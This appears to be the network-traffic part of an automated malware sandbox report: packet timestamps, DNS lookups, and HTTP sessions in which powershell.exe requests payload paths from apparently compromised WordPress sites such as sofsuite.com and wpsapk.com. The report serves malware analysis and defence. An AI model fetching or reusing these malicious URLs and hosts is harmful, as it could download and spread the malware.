Jan 7, 2021 18:44:35.109308004 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.109313011 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109338045 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109363079 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109430075 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.109435081 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109442949 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.110745907 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.373472929 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373526096 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373562098 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373615980 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373655081 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373672962 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.373687983 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373692036 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.373730898 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373771906 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.373783112 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373799086 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373825073 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373848915 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373871088 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373893023 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373910904 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.373917103 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.373919010 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373941898 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373960018 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373972893 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373974085 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.373985052 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.373997927 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374008894 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374028921 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374048948 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374054909 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.374066114 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374089003 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374093056 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.374110937 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374111891 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.374133110 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374156952 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374176979 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.374181032 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374197006 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.374205112 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374228001 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374243021 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.374254942 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374275923 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374296904 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374317884 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374327898 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.374331951 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.374377012 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374381065 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.374408960 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374453068 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374480009 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.374486923 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374504089 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374516964 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374535084 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374552965 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374569893 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374586105 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374603033 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374604940 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.374619961 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374643087 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374646902 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.374664068 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.374735117 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.374739885 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.376188993 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.638736010 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.638801098 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.638823986 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.638851881 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.638873100 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.638891935 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.638896942 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.638925076 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.638945103 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.638957977 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.638983011 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639003992 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.639005899 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639036894 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639055967 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639094114 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.639098883 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639100075 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.639123917 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639163017 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639188051 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639214993 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.639216900 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639240026 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639276981 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.639282942 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.639293909 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639336109 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639358044 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639386892 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639411926 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.639413118 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639441013 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.639446974 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639470100 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639503956 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639528990 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.639533043 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.639554977 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.640515089 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.952964067 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.952987909 CET	49168	80	192.168.2.22	45.130.229.91
Jan 7, 2021 18:44:35.953363895 CET	49166	80	192.168.2.22	172.67.158.72
Jan 7, 2021 18:44:46.958343029 CET	49172	80	192.168.2.22	5.2.136.90
Jan 7, 2021 18:44:47.031069040 CET	80	49172	5.2.136.90	192.168.2.22
Jan 7, 2021 18:44:47.031249046 CET	49172	80	192.168.2.22	5.2.136.90
Jan 7, 2021 18:44:47.033138990 CET	49172	80	192.168.2.22	5.2.136.90
Jan 7, 2021 18:44:47.033278942 CET	49172	80	192.168.2.22	5.2.136.90
Jan 7, 2021 18:44:47.106055975 CET	80	49172	5.2.136.90	192.168.2.22
Jan 7, 2021 18:44:47.106178999 CET	49172	80	192.168.2.22	5.2.136.90
Jan 7, 2021 18:44:47.179042101 CET	80	49172	5.2.136.90	192.168.2.22
Jan 7, 2021 18:44:47.179127932 CET	49172	80	192.168.2.22	5.2.136.90
Jan 7, 2021 18:44:47.252042055 CET	80	49172	5.2.136.90	192.168.2.22
Jan 7, 2021 18:44:47.754265070 CET	80	49172	5.2.136.90	192.168.2.22
Jan 7, 2021 18:44:47.754307032 CET	80	49172	5.2.136.90	192.168.2.22
Jan 7, 2021 18:44:47.754384995 CET	49172	80	192.168.2.22	5.2.136.90
Jan 7, 2021 18:44:47.754420042 CET	49172	80	192.168.2.22	5.2.136.90
Jan 7, 2021 18:45:52.749216080 CET	80	49172	5.2.136.90	192.168.2.22
Jan 7, 2021 18:45:52.749396086 CET	49172	80	192.168.2.22	5.2.136.90

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2021 18:44:30.075944901 CET	52197	53	192.168.2.22	8.8.8.8
Jan 7, 2021 18:44:30.135895967 CET	53	52197	8.8.8.8	192.168.2.22
Jan 7, 2021 18:44:30.376312971 CET	53099	53	192.168.2.22	8.8.8.8
Jan 7, 2021 18:44:30.447573900 CET	53	53099	8.8.8.8	192.168.2.22
Jan 7, 2021 18:44:30.576024055 CET	52838	53	192.168.2.22	8.8.8.8
Jan 7, 2021 18:44:30.742572069 CET	53	52838	8.8.8.8	192.168.2.22
Jan 7, 2021 18:44:31.077896118 CET	61200	53	192.168.2.22	8.8.8.8
Jan 7, 2021 18:44:31.439886093 CET	53	61200	8.8.8.8	192.168.2.22
Jan 7, 2021 18:44:32.096111059 CET	49548	53	192.168.2.22	8.8.8.8
Jan 7, 2021 18:44:32.459737062 CET	53	49548	8.8.8.8	192.168.2.22
Jan 7, 2021 18:44:33.738118887 CET	55627	53	192.168.2.22	8.8.8.8
Jan 7, 2021 18:44:34.039865017 CET	53	55627	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 7, 2021 18:44:30.075944901 CET	192.168.2.22	8.8.8.8	0x315e	Standard query (0)	wpsapk.com	A (IP address)	IN (0x0001)
Jan 7, 2021 18:44:30.376312971 CET	192.168.2.22	8.8.8.8	0x8df5	Standard query (0)	sofsuite.com	A (IP address)	IN (0x0001)
Jan 7, 2021 18:44:30.576024055 CET	192.168.2.22	8.8.8.8	0x7e45	Standard query (0)	veterinariadrpopui.com	A (IP address)	IN (0x0001)
Jan 7, 2021 18:44:31.077896118 CET	192.168.2.22	8.8.8.8	0x6029	Standard query (0)	shop.elemenslide.com	A (IP address)	IN (0x0001)
Jan 7, 2021 18:44:32.096111059 CET	192.168.2.22	8.8.8.8	0x1168	Standard query (0)	shop.elemenslide.com	A (IP address)	IN (0x0001)
Jan 7, 2021 18:44:33.738118887 CET	192.168.2.22	8.8.8.8	0x8c10	Standard query (0)	khanhhoahomnay.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 7, 2021 18:44:30.135895967 CET	8.8.8.8	192.168.2.22	0x315e	No error (0)	wpsapk.com	172.67.141.14	A (IP address)	IN (0x0001)
Jan 7, 2021 18:44:30.135895967 CET	8.8.8.8	192.168.2.22	0x315e	No error (0)	wpsapk.com	104.18.61.59	A (IP address)	IN (0x0001)
Jan 7, 2021 18:44:30.135895967 CET	8.8.8.8	192.168.2.22	0x315e	No error (0)	wpsapk.com	104.18.60.59	A (IP address)	IN (0x0001)
Jan 7, 2021 18:44:30.447573900 CET	8.8.8.8	192.168.2.22	0x8df5	No error (0)	sofsuite.com	172.67.158.72	A (IP address)	IN (0x0001)
Jan 7, 2021 18:44:30.447573900 CET	8.8.8.8	192.168.2.22	0x8df5	No error (0)	sofsuite.com	104.27.144.251	A (IP address)	IN (0x0001)
Jan 7, 2021 18:44:30.447573900 CET	8.8.8.8	192.168.2.22	0x8df5	No error (0)	sofsuite.com	104.27.145.251	A (IP address)	IN (0x0001)
Jan 7, 2021 18:44:30.742572069 CET	8.8.8.8	192.168.2.22	0x7e45	No error (0)	veterinariadrpopui.com	209.59.139.39	A (IP address)	IN (0x0001)
Jan 7, 2021 18:44:31.439886093 CET	8.8.8.8	192.168.2.22	0x6029	No error (0)	shop.elemenslide.com	45.130.229.91	A (IP address)	IN (0x0001)
Jan 7, 2021 18:44:32.459737062 CET	8.8.8.8	192.168.2.22	0x1168	No error (0)	shop.elemenslide.com	45.130.229.91	A (IP address)	IN (0x0001)
Jan 7, 2021 18:44:34.039865017 CET	8.8.8.8	192.168.2.22	0x8c10	No error (0)	khanhhoahomnay.net	210.86.239.69	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

wpsapk.com

sofsuite.com

veterinariadrpopui.com

shop.elemenslide.com

khanhhoahomnay.net

5.2.136.90

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	172.67.141.14	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 7, 2021 18:44:30.203901052 CET	0	OUT	GET /wp-admin/v/ HTTP/1.1 Host: wpsapk.com Connection: Keep-Alive
Jan 7, 2021 18:44:30.344028950 CET	1	IN	HTTP/1.1 503 Service Temporarily Unavailable Date: Thu, 07 Jan 2021 17:44:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: __cfduid=d8b7506db4f74314ae3b57f6dbe6ac1c31610041470; expires=Sat, 06-Feb-21 17:44:30 GMT; path=/; domain=.wpsapk.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT cf-request-id: 077f8c452100000c01080e2000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=8lqtZejLfOVamkn%2BPl6hy5XFK4AXo4i%2FCBAfR597ZJF%2FYROmB8JlivN9ChBG46FvwWvrvHz2D5Aw%2B35S9bfu%2FOGgNQZVyqvwo%2Bic"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60df7cb4fe450c01-AMS Data Raw: 32 30 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 62 Data Ascii: 2018<!DOCTYPE HTML><html lang="en-US"><head> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <title>Just a moment...</title> <style type="text/css"> html, body {width: 100%; height: 100%; margin: 0; padding: 0;} b
Jan 7, 2021 18:44:30.344073057 CET	3	IN	Data Raw: 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d Data Ascii: ody {background-color: #ffffff; color: #000000; font-family:-apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, "Helvetica Neue",Arial, sans-serif; font-size: 16px; line-height: 1.7em;-webkit-font-smoothing: antia
Jan 7, 2021 18:44:30.344098091 CET	4	IN	Data Raw: 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 70 78 3b 7d 0a 20 20 20 20 23 63 66 2d 77 72 61 70 70 65 72 20 23 63 68 61 6c 6c 65 6e 67 65 2d 66 6f 72 6d 20 7b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 35 70 Data Ascii: isplay: block; margin-top: 8px;} #cf-wrapper #challenge-form { padding-top:25px; padding-bottom:25px; } #cf-hcaptcha-container { text-align:center;} #cf-hcaptcha-container iframe { display: inline-block;} </style> <meta http
Jan 7, 2021 18:44:30.344122887 CET	5	IN	Data Raw: 31 47 4f 70 37 6f 56 63 47 57 72 73 53 79 4e 73 69 58 4b 63 41 38 43 78 37 50 46 70 47 48 38 70 62 4c 78 5a 72 6f 65 79 4e 58 65 72 51 79 31 52 4f 53 66 34 71 37 4a 75 45 2f 66 38 64 50 63 58 2b 32 4d 39 45 31 37 54 67 45 66 49 2b 69 70 6d 52 59 Data Ascii: 1GOp7oVcGWrsSyNsiXKcA8Cx7PFpGH8pbLxZroeyNXerQy1ROSf4q7JuE/f8dPcX+2M9E17TgEfI+ipmRYG99/eQ==", t: "MTYxMDA0MTQ3MC4zMzAwMDA=", m: "7qlRpafVGS2jSCOIuSsXlxOuM7B2lQ3Kdg+yi4n74II=", i1: "AsSeEpVviFGklXNLdio2lA==", i2:
Jan 7, 2021 18:44:30.344146013 CET	7	IN	Data Raw: 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0a 20 20 20 20 20 20 63 70 6f 2e 74 79 70 65 20 3d 20 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3b 0a 20 20 20 20 20 20 63 70 6f 2e 73 72 63 20 3d 20 22 2f 63 64 Data Ascii: .createElement('script'); cpo.type = 'text/javascript'; cpo.src = "/cdn-cgi/challenge-platform/h/g/orchestrate/jsch/v1"; var done = false; cpo.onload = cpo.onreadystatechange = function() { if (!done && (!this.r
Jan 7, 2021 18:44:30.344171047 CET	8	IN	Data Raw: 63 6f 6f 6b 69 65 73 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 62 64 32 34 32 36 3b 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 43 6f 6f 6b 69 65 73 20 61 6e 64 20 72 65 6c 6f 61 64 20 74 68 65 20 70 61 67 65 2e 3c 2f 70 3e 0a 20 20 20 Data Ascii: cookies" style="color:#bd2426;">Please enable Cookies and reload the page.</p> </div> <p data-translate="process_is_automatic">This process is automatic. Your browser will redirect to your requested content shortly.</p> <p data-tra
Jan 7, 2021 18:44:30.344188929 CET	9	IN	Data Raw: 73 43 47 6e 34 72 58 6c 44 63 34 4a 4b 6f 30 67 4b 74 58 41 53 46 4f 74 34 33 6f 66 46 74 39 53 47 52 4d 69 37 6d 51 77 31 69 76 63 61 5a 78 62 66 77 36 65 6b 6c 49 7a 4b 58 6b 66 4c 79 36 77 38 33 58 66 6e 70 31 6d 64 38 79 5a 64 76 34 48 49 35 Data Ascii: sCGn4rXlDc4JKo0gKtXASFOt43ofFt9SGRMi7mQw1ivcaZxbfw6eklIzKXkfLy6w83Xfnp1md8yZdv4HI5qMBFYzPYPOC+mfce/lNuuJe17u38ZEHf5PKLz+z6tJP6GzV4CSPrK72WmhNadnzv2KoSKaU/4ZDNLlmYC6t5Dz0xmcZNT/Gmbf0hvCDiqTKvOcOGgDUlzgHb3Xs9vQmU4Crz8o2Thj8FXhE="/> <input ty
Jan 7, 2021 18:44:30.344202042 CET	9	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	172.67.158.72	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 7, 2021 18:44:30.495342970 CET	10	OUT	GET /wp-includes/2jm3nIk/ HTTP/1.1 Host: sofsuite.com Connection: Keep-Alive
Jan 7, 2021 18:44:30.559907913 CET	12	IN	HTTP/1.1 200 OK Date: Thu, 07 Jan 2021 17:44:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d01a5316175caa3b723e115a9e178dbb51610041470; expires=Sat, 06-Feb-21 17:44:30 GMT; path=/; domain=.sofsuite.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 077f8c464300000c79aab30000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MIFsTKo1m7OxHsT5HW3d0aKz%2BsoPrwOhej7TTyXhcLuVAd9NqBemOjCMPV0m1TGhoqhnMr%2BN7N8a3U2XEII28eGe8vOrlMZcZjZWsCY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60df7cb6dfe70c79-AMS Data Raw: 31 30 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d Data Ascii: 10dd<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-
